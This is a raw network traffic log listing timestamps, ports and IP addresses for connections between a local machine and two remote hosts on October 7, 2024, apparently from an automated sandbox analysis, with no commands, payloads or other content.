Oct 7, 2024 03:15:44.555555105 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.555571079 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.555588007 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.555604935 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.555620909 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.555635929 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.555654049 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.555668116 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.555689096 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.555701017 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.555738926 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.555772066 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.555788040 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.555804968 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.555819988 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.555820942 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.555857897 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.555869102 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.555886984 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.555910110 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.555936098 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.555984020 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.556018114 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.556051016 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.556071043 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.556083918 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.556099892 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.556118011 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.556128979 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.556153059 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.556185961 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.556210995 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.556210995 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.556221008 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.556231976 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.556253910 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.556268930 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.556293011 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.556299925 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.556324959 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.556341887 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.556360960 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.556371927 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.556408882 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.556412935 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.556447029 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.556461096 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.556474924 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.556512117 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.556525946 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.556525946 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.556560993 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.556564093 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.556612968 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.556613922 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.556652069 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.556684971 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.556700945 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.556735992 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.556736946 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.556771040 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.556787014 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.556803942 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.556819916 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.556838989 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.556850910 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.556871891 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.556885958 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.556904078 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.556916952 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.556938887 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.556952953 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.556971073 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.556986094 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.557017088 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.557024002 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.557069063 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.557104111 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.557151079 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.557157040 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.557202101 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.557209015 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.557243109 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.557255983 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.557275057 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.557287931 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.557310104 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.557322025 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.557359934 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.557359934 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.557408094 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.557423115 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.557455063 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.557471037 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.557488918 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.557507038 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.557539940 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.557548046 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.557575941 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.557605982 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.557607889 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.557632923 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.557641029 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.557661057 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.557673931 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.557689905 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.557706118 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.557722092 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.557738066 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.557770967 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.557773113 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.557794094 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.557805061 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.557821035 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.557857990 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.557878017 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.557890892 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.557919979 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.557943106 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.557945967 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.558017969 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.558051109 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.558067083 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.558085918 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.558101892 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.558135033 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.558165073 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.558198929 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.558213949 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.558232069 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.558245897 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.558264971 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.558278084 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.558298111 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.558315039 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.558331013 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.558346033 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.558363914 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.558381081 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.558401108 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.558418989 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.558435917 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.558450937 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.558468103 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.558482885 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.558501005 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.558517933 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.558532953 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.558548927 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.558566093 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.558578968 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.558594942 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.558614016 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.558628082 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.558640957 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.558661938 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.558676004 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.558696032 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.558711052 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.558731079 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.558742046 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.558764935 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.558779955 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.558798075 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.558811903 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.558845997 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.564470053 CEST	443	49862	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:44.569536924 CEST	49863	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:44.569571018 CEST	443	49863	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:44.570063114 CEST	49863	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:44.570072889 CEST	443	49863	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:44.570466995 CEST	49862	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:44.570489883 CEST	443	49862	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:44.570852041 CEST	49862	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:44.570859909 CEST	443	49862	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:44.648021936 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.648046017 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.648060083 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.648072004 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.648086071 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.648108006 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.648119926 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.648140907 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.648152113 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.648163080 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.648175001 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.648188114 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.648200035 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.648197889 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.648214102 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.648226023 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.648247004 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.648264885 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.648267031 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.648279905 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.648292065 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.648303032 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.648330927 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.648349047 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.648360968 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.648360014 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.648366928 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.648360014 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.648375988 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.648360014 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.648381948 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.648389101 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.648406029 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.648442030 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.648443937 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.648462057 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.648463011 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.648474932 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.648494005 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.648494959 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.648508072 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.648519993 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.648533106 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.648540974 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.648545027 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.648587942 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.648606062 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.648854017 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.648865938 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.648876905 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.648910046 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.648926973 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.648927927 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.648941040 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.648952007 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.648967981 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.648987055 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.648988008 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.649008989 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.649020910 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.649023056 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.649039984 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.649046898 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.649053097 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.649063110 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.649080038 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.649084091 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.649102926 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.649116039 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.649118900 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.649128914 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.649143934 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.649173021 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.649180889 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.649184942 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.649198055 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.649215937 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.649226904 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.649228096 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.649281979 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.649281979 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.649296999 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.649308920 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.649322033 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.649337053 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.649358988 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.649364948 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.649380922 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.649380922 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.649393082 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.649405003 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.649419069 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.649420977 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.649461985 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.649480104 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.649564028 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.649595976 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.649620056 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.649638891 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.649668932 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.649720907 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.649842024 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.649898052 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.650259972 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.650285006 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.650299072 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.650311947 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.650332928 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.650362015 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.650369883 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.650393963 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.650408030 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.650413036 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.650440931 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.650450945 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.650465012 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.650468111 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.650480032 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.650495052 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.650502920 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.650516987 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.650532961 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.650532961 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.650558949 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.650563002 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.650563002 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.650574923 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.650589943 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.650602102 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.650615931 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.650629997 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.650630951 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.650648117 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.650671959 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.650675058 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.650692940 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.650702000 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.650716066 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.650716066 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.650731087 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.650744915 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.650752068 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.650759935 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.650778055 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.650787115 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.650800943 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.650821924 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.650865078 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.650887012 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.650901079 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.650914907 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.650932074 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.650949001 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.650968075 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.650999069 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.651200056 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.651249886 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.651310921 CEST	80	49782	95.164.90.97	192.168.2.5
